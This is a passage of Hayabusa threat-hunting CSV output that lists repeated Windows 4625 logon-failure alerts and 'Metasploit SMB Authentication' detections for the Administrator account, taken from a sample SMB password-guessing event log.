Password,User: Administrator : Type: 3 : Workstation: DWT0NepMYD29cOwh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DDb7wV6uzj1tat2d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RBcmANUL4a6DFobS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL2swHF9MtnCfnp3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0ZkcAD0IakqSUph : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5HgksdIGukmliZeE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYoLckmmOWCSf4Q2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PTxr8Zkz2y2XwBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3caypkIM2XqoSSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yuQOUzJ6sU5AhARR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SyM3OrjUHub9k23k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vY7SRoWumGQOrljW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iFrO2nUMlfeDLGyc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9B8Gq7d30U8DqdN0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxSPuxpCHgSo1d1a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9elGZ4POExblUCAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XHY9Ig3sqQKNXYqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: voMDzTqYqKpfudKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8m9SJ1aFpvFqClU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dM84lQYVfHhZmgpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: O5FrdBbYXWaqFkeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxiNMjsd3YfoCNa2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v1u5uD9SiDFq9VOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pZv9l3b7U8tIVmw8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EfPqiBhm6hRX700 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uvqgri2KGIDAlg1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLXZMXKsjOaurgZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXtiRWHDJqpq69Ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeC1T9YkT1hXMcGG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPf6nlwAeuu7cf00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 4fvVUozD2RuIchN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP3rghcrgas3l3q1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MMtcQYoVoM57gTcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFjTWECEep09Abjt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jUlguy8tKBo4DSUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GETwMERLpiVtMRkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhas9Vjc193EVcOg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmVAnxq39t7qbcEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13y2nnltjipwZqth : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDQrPBL1VodIcQLR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: K0Mp4jXeHd3b0CLw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3j89GmIDnG4v7JJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyRLZMoaXJUrPPfn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcoyOKUjEi1uCSpD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWQGVJLcVwgf4YJ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrFqG85mmjTYJ4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DqIh1QHTk470nrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
